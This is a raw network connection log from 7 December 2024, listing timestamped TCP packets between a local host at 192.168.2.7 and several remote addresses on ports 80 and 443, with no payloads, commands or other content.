Dec 7, 2024 12:59:17.434412003 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.434454918 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.434832096 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.434881926 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.435288906 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.435343027 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.435714960 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.435755968 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.436113119 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.436151028 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.436680079 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.436723948 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.437202930 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.437247992 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.437408924 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.437448978 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.437868118 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.437921047 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.438282013 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.438328028 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.438746929 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.438792944 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.439093113 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.439135075 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.440212011 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.440223932 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.440258980 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.440896034 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.440939903 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.441302061 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.441344976 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.441750050 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.441761971 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.441791058 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.441812992 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.442552090 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.442593098 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.442976952 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.443017960 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.443439960 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.443455935 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.443475962 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.443499088 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.444263935 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.444304943 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.444679976 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.444722891 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.445101976 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.445144892 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.445521116 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.445590973 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.445947886 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.445986032 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.446357965 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.446398020 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.449522972 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.449568987 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.490746975 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.490801096 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.490938902 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.490977049 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.491352081 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.491394043 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.491838932 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.491879940 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.492335081 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.492372036 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.492686987 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.492723942 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.493136883 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.493180990 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.493557930 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.493597031 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.494193077 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.494235992 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.494800091 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.494848013 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.495970964 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.496007919 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.496454000 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.496511936 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.500487089 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.500500917 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.500544071 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.501404047 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.501421928 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.501446009 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.501458883 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.502350092 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.502363920 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.502401114 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.503271103 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.503284931 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.503335953 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.503335953 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.504219055 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.504232883 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.504242897 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.504262924 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.504276991 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.505135059 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.505156040 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.505181074 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.505213022 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.506125927 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.506181955 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.507061958 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.507072926 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.507116079 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.507189035 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.508943081 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.508956909 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.508981943 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.509010077 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.513628006 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.513639927 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.513684034 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.515547991 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.515567064 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.515594006 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.515610933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.516563892 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.516633034 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.517399073 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.517411947 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.517452002 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.555303097 CET	443	49700	104.98.116.138	192.168.2.7
Dec 7, 2024 12:59:17.555439949 CET	49700	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:18.783720970 CET	443	49705	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.783869982 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.784586906 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.784586906 CET	49705	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.784621954 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.784622908 CET	443	49705	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.784967899 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.784977913 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.785168886 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.785176992 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.785343885 CET	49705	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.785351992 CET	443	49705	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.785482883 CET	49706	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.785490990 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.785645962 CET	443	49707	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.785780907 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.785788059 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.785876036 CET	49706	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.785881042 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.786098957 CET	49707	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.786108971 CET	443	49707	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.786195993 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.786200047 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:18.786457062 CET	49707	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:18.786463022 CET	443	49707	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.221148968 CET	443	49705	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.221215963 CET	443	49705	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.221303940 CET	49705	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.222148895 CET	443	49707	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.222223997 CET	443	49707	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.222279072 CET	49707	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.224363089 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.224391937 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.224467993 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.224500895 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.224548101 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.230298996 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.230377913 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.230438948 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.230654001 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.230684996 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.230743885 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.230756044 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.230825901 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.230853081 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.230880022 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.230921984 CET	49706	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.230927944 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.231538057 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.234133959 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.234174967 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.234235048 CET	49706	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.234235048 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.242711067 CET	49705	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.242736101 CET	443	49705	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.242748022 CET	49705	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.242753983 CET	443	49705	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.244415998 CET	49706	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.244415998 CET	49706	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.244436026 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.244441986 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.245186090 CET	49707	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.245191097 CET	443	49707	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.245206118 CET	49707	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.245209932 CET	443	49707	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.245477915 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.245477915 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.245500088 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.245503902 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.246664047 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.246674061 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.246743917 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.246751070 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.381604910 CET	49708	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.381640911 CET	443	49708	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.381730080 CET	49708	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.389616966 CET	49709	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.389657974 CET	443	49709	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.389727116 CET	49709	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.450896025 CET	49708	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.450911045 CET	443	49708	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.453630924 CET	49709	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.453654051 CET	443	49709	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.593677044 CET	49710	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.593708992 CET	443	49710	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.593825102 CET	49710	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.660909891 CET	49710	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.660923958 CET	443	49710	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.733655930 CET	49711	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.733707905 CET	443	49711	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.733787060 CET	49711	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.737247944 CET	49712	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.737279892 CET	443	49712	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.737390995 CET	49712	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.813173056 CET	49711	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.813213110 CET	443	49711	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.813642025 CET	49712	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:19.813659906 CET	443	49712	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:19.885334015 CET	49671	443	192.168.2.7	204.79.197.203
Dec 7, 2024 12:59:20.015324116 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.015364885 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:20.015439034 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.015568018 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.015615940 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:20.015703917 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.015743017 CET	443	49716	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:20.015744925 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.015820980 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.017586946 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.017602921 CET	443	49716	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:20.017899990 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.017930984 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:20.018138885 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.018155098 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:20.060427904 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.060481071 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:20.060559034 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.060981989 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:20.061002970 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.039081097 CET	49677	443	192.168.2.7	20.50.201.200
Dec 7, 2024 12:59:21.166543007 CET	443	49708	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.167114019 CET	49708	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.167139053 CET	443	49708	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.167243004 CET	443	49709	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.167691946 CET	49708	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.167715073 CET	443	49708	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.167963982 CET	49709	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.167984009 CET	443	49709	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.168343067 CET	49709	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.168349028 CET	443	49709	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.221018076 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:21.223269939 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:21.382747889 CET	443	49710	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.385644913 CET	49710	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.385694981 CET	443	49710	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.386126995 CET	49710	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.386135101 CET	443	49710	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.543943882 CET	443	49711	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.544055939 CET	443	49712	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.544675112 CET	49711	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.544696093 CET	49712	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.544703960 CET	443	49711	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.544738054 CET	443	49712	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.545181990 CET	49711	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.545186996 CET	443	49711	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.545267105 CET	49712	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.545280933 CET	443	49712	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.600672007 CET	443	49708	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.600754976 CET	443	49708	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.600883007 CET	49708	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.601085901 CET	49708	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.601111889 CET	443	49708	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.601156950 CET	49708	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.601166010 CET	443	49708	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.601716995 CET	443	49709	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.601783037 CET	443	49709	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.602030039 CET	49709	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.602196932 CET	49709	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.602216005 CET	443	49709	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.602221966 CET	49709	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.602227926 CET	443	49709	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.605288982 CET	49722	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.605336905 CET	443	49722	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.605667114 CET	49723	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.605684996 CET	49722	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.605701923 CET	443	49723	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.605772972 CET	49723	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.605923891 CET	49723	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.605933905 CET	49722	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.605937004 CET	443	49723	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.605952024 CET	443	49722	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.712506056 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.712954998 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.712979078 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.714066982 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.714154959 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.715426922 CET	443	49716	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.715584993 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.715651035 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.715835094 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.715843916 CET	443	49716	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.716248035 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.716253996 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.716866970 CET	443	49716	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.716927052 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.717874050 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.717916012 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.717979908 CET	443	49716	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.718099117 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.718116999 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.718205929 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.718214035 CET	443	49716	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.719228983 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.719289064 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.720195055 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.720283031 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.720336914 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.750473976 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.750822067 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.750848055 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.751856089 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.751923084 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.752223969 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.752281904 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.752321959 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.758512020 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.758522987 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.767338037 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.774169922 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.774184942 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.795339108 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.805428982 CET	49719	443	192.168.2.7	142.250.181.68
